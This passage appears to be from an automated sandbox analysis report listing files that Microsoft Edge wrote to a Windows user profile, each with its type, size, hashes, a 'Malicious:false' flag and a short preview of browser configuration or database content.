                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6c3ddfb0-e714-47ed-b6b4-887f16a828b5.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13731
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.225739965235268
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzG6ID+CXY/3M8tpj+FVA1OqJj1f:sVeLAoxuJJzGt+rpUVGOqj
                                                                                                                                                                                                                                                                                  MD5:31E9C982ECC575412F351FCBB2D2F93A
                                                                                                                                                                                                                                                                                  SHA1:1C53852FCC1932193EEE929EF78EFD4B6327B4F3
                                                                                                                                                                                                                                                                                  SHA-256:980BBC14E48516B7BF02D5E7BA51AB6113A1968B22ED9E181BFD3015CCEC9A1F
                                                                                                                                                                                                                                                                                  SHA-512:1489D6A7BFA31C1B764B6A94889A595A4E7FC199576B3067AE69E720DB8D8F21F3831294C8B3621C4FD77BA28481D4F7F2E5E047FE6CE55A5A2CB73245B7D457
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\96d2d5c2-3dd3-43ac-9120-84b9204bc8a6.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12421
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0583951451496
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzGaY/3M8tpj+FVAGOHJj1f:sVeLAoxuJJzGhpUVFOHj
                                                                                                                                                                                                                                                                                  MD5:E268FBBAEBE733885CA9D4A17CF9F7E9
                                                                                                                                                                                                                                                                                  SHA1:46956FD685C00360F3862023A6BD650534238D7C
                                                                                                                                                                                                                                                                                  SHA-256:6CB33BB115A722B91AEDF94EB3B8CBE9A189A8FF94ACA96105E3E7AB1ADE7D10
                                                                                                                                                                                                                                                                                  SHA-512:5BFDA37E4B88CB805F71061D66F4050462CC1E030640A86C9777B3A6A76574109EAE28EB506960104A3D67C3A2B9F58611B60A5AF9F27F8966C5D3DF58937C6E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\97adac28-261e-41b1-8199-a657ca220b3a.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):1695826
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.041130491204814
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24576:NPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:NPfZ/mS5
                                                                                                                                                                                                                                                                                  MD5:8C93F8137F910A217A2E04472D7BF2E0
                                                                                                                                                                                                                                                                                  SHA1:E670843690F2CE7F5C063482DE1A35881356DD93
                                                                                                                                                                                                                                                                                  SHA-256:ED04733D97B4798078B299B27402D7029407A2F2621E422E0C353354F431BA1A
                                                                                                                                                                                                                                                                                  SHA-512:A9D159C17B6D05ECEA6F1D08552E2E4CB8B12560C124653873B2CDBC84F2DE56358BCAB5E95B0FE335A0376105E2FBA00263E4857D47A45D789CC888F29F6E97
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1b..u.................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13378326097495268.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]...a.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13378326097498783.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):293
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.099698946546919
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7xXhq1wkn23oH+Tcwt9Eh1ZB2KLlpGq2Pwkn23oH+Tcwt9Eh1tIFUv:7xXh1fYeb9Eh1ZFLTGvYfYeb9Eh16FUv
                                                                                                                                                                                                                                                                                  MD5:23ED81DE7AA96B370A734316D93C2D27
                                                                                                                                                                                                                                                                                  SHA1:7E5764F6CD5EA57C6F7BED97E0878131A28C8A5C
                                                                                                                                                                                                                                                                                  SHA-256:DAC18BB7B4175D555DF6F59F162A2014AAC956859BF81858C9967DFA1807F902
                                                                                                                                                                                                                                                                                  SHA-512:F0F860690035F1ACDAED48200C1E51C56C259066A64FACC757168177A2D89F354EFC1B65F7116A2A855E50553294B656E9FBD1A9C5A39D8E001E29F2F3A466E8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:35.457 20f0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2024/12/10-12:41:35.586 20f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3202460253800455
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                                                                                                                  MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                                                                                                                  SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                                                                                                                  SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                                                                                                                  SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Collections\collectionsSQLite

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                                  MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                                  SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                                  SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                                  SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                                  MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                                  SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                                  SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                                  SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlJSJ/ll:Ls36ll
                                                                                                                                                                                                                                                                                  MD5:CEE320ABC955E8B38D231B149030967A
                                                                                                                                                                                                                                                                                  SHA1:40FD02E20AFC47D19FD33E27F51F601FD1333539
                                                                                                                                                                                                                                                                                  SHA-256:86A3704DB9B4E9561403845527D6438D2E61FBEE07809DAFCFA75C97F42C997A
                                                                                                                                                                                                                                                                                  SHA-512:F3DAF9F18969F676A17D83C9562781C22F7D77BED8BFB6D044625702910505C3F52D26BF2A131BE2AE9AF8D80A03C438E27BA880D1CA63EF4047464F3D16B9A6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..........................................9F../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                  Encrypted:false
